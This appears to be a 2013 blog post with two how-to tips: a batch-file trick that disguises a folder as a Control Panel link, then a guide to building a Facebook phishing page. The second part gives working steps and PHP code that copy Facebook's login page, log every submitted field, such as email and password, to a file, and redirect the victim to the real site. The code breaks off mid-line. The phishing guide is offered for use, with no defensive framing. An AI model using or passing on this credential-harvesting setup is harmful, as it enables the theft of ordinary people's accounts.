Sunday, August 25, 2013

How to Lock your PRIVATE FOLDER

1. Make a folder on the desktop and name it as “folder”

2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.

3. In the ‘save as’ name it as lock.bat and click save ! (Save it on Desktop)

4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.


5. In the ‘save as’ name it as key.bat and click save ! (Save it on Desktop)


6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !


7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !


8. Lock your folder and hide the key.bat somewhere else on your hard disk !


9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it ! :)

How to Make Facebook as a Phishing site

Facebook Phishing 




1.Open Facebook and just right click anywhere on the page and select view page source. 

2. copy the source code and paste it in notepad After that just press CTRL+F and find “action=” 

3. And remove the link and just write “action.php” 

4. And save that source code as HTML I am giving the name INDEX.HTML and  Tt's time to make action.php file. 

5.Open your notepad and paste the source code given below and save it as action.php <?php //www.facebook.com header("Location: http://www.facebook.com"); $handle = fopen("logs.html", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fwrite($handle,...